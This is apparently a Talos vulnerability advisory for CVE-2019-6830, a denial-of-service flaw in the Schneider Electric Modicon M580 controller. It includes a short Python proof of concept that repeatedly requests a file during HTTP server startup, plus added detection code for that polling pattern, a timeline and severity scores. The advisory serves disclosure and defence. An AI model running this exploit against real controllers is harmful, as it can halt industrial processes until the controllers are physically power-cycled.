Schneider Electric Modicon M580 HTTP Request Denial of Service Vulnerability
2019-08-13T00:00:00
ID TALOS-2019-0808 Type talos Reporter Talos Intelligence Modified 2019-08-13T00:00:00
Description
Talos Vulnerability Report
TALOS-2019-0808
August 13, 2019
CVE Number
CVE-2019-6830
Summary
An exploitable denial of service vulnerability exists in the HTTP request processing of the Schneider Electric Modicon M580 Programmable Automation Controller firmware version SV2.70. An appropriately timed HTTP request can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.
The Modicon M580 is the latest in Schneider Electric’s Modicon line of Programmable Automation Controllers. The device boasts a Wurldtech Achilles Level 2 certification and global policy controls to quickly enforce various security configurations. Communication with the device is possible over FTP, TFTP, HTTP, SNMP, EtherNet/IP, Modbus, and a management protocol referred to as UMAS.
When an HTTP request to an existing resource is sent during the initialization process of the device’s HTTP server, it is possible to make the device enter a non-recoverable fault state, causing a denial of service condition.
In the non-recoverable fault state the CPU has entered an error mode where all remote communications have been stopped, process logic stops execution, and the device requires a physical power cycle to regain functionality.
Exploit Proof of Concept
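import requests
from time import sleep


def main():
    rhost = "192.168.10.1"
    uri = "http://%s/cabs/RdePocket.CAB" % (rhost)
    max_tries = 100
    results = []
    # Python 3: range() replaces the original xrange()
    for i in range(max_tries):
        try:
            res = requests.get(uri, timeout=10)
            results.append(res)
        except requests.exceptions.RequestException:
            # Request failed (refused or timed out): wait briefly and retry
            sleep(0.1)


if __name__ == '__main__':
    main()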
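Detection logic for the condition described above, added here as an example and not part of the Talos report: it flags a source that rapidly retries a controller's port 80 while the port is not answering, and notes whether the controller has answered anyone since. The flow record format, the controller list (192.168.10.1 is the address used in the proof of concept, the others are constructed) and both thresholds are assumptions.

```python
from collections import defaultdict

CONTROLLERS = {"192.168.10.1", "192.168.10.2", "192.168.10.3"}  # assumed asset list
BURST_COUNT = 3     # assumed threshold: failed attempts from one source...
BURST_WINDOW = 2.0  # ...within this many seconds

# Constructed flow records, not captured traffic: "epoch src dst dport result",
# where result is "fail" (refused or timed out) or "ok" (HTTP response received).
SAMPLE_FLOWS = """\
100.0 10.0.0.5 192.168.10.1 80 ok
160.0 10.0.0.9 192.168.10.1 80 fail
160.1 10.0.0.9 192.168.10.1 80 fail
160.2 10.0.0.9 192.168.10.1 80 fail
200.0 10.0.0.5 192.168.10.2 80 fail
260.0 10.0.0.5 192.168.10.2 80 fail
320.0 10.0.0.5 192.168.10.2 80 fail
380.0 10.0.0.5 192.168.10.2 80 ok
400.0 10.0.0.9 192.168.10.3 80 fail
400.1 10.0.0.9 192.168.10.3 80 fail
400.2 10.0.0.9 192.168.10.3 80 fail
430.0 10.0.0.5 192.168.10.3 80 ok
"""

def find_boot_window_polling(text):
    """Flag sources that retry a controller's port 80 rapidly while it is not answering."""
    fails = defaultdict(list)  # (src, dst) -> timestamps of failed attempts
    last_ok = {}               # dst -> time of the latest successful HTTP exchange
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip malformed records
        ts, src, dst, dport, result = float(parts[0]), *parts[1:]
        if dst not in CONTROLLERS or dport != "80":
            continue
        if result == "ok":
            last_ok[dst] = max(ts, last_ok.get(dst, ts))
        else:
            fails[(src, dst)].append(ts)
    alerts = []
    for (src, dst), times in sorted(fails.items()):
        times.sort()
        for i in range(len(times) - BURST_COUNT + 1):
            if times[i + BURST_COUNT - 1] - times[i] <= BURST_WINDOW:
                # No answer since the burst began matches the fault state in the report.
                silent = last_ok.get(dst, float("-inf")) < times[i]
                alerts.append({"src": src, "dst": dst, "burst_start": times[i],
                               "silent_since_burst": silent})
                break
    return alerts
```

An alert with silent_since_burst set to True is the case to check on site first, since the report states the fault state ends all remote communication until a physical power cycle.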
Timeline
2019-04-10 - Vendor Disclosure
2019-08-13 - Vendor Patched; Public Release
Credit
Discovered by Jared Rittle of Cisco Talos.
Tested Versions
Schneider Electric Modicon M580 BMEP582040 SV2.70
Product URLs
https://www.schneider-electric.com/en/work/campaign/m580-epac/
CVSSv3 Score
5.9 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE
CWE-248: Uncaught Exception
Reference
http://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0808
CVE-2019-6830 (NVD)
A CWE-248: Uncaught Exception vulnerability exists in Modicon M580 all versions prior to V2.80, which could cause a possible denial of service when sending an appropriately timed HTTP request to the controller.
Published 2019-09-17T20:15:00, modified 2019-10-09T23:51:00
CVSS v3.1: 5.9 (MEDIUM) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
CVSS v2: 7.1 (HIGH) - AV:N/AC:M/Au:N/C:N/I:N/A:C
CWE (NVD): CWE-755
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6830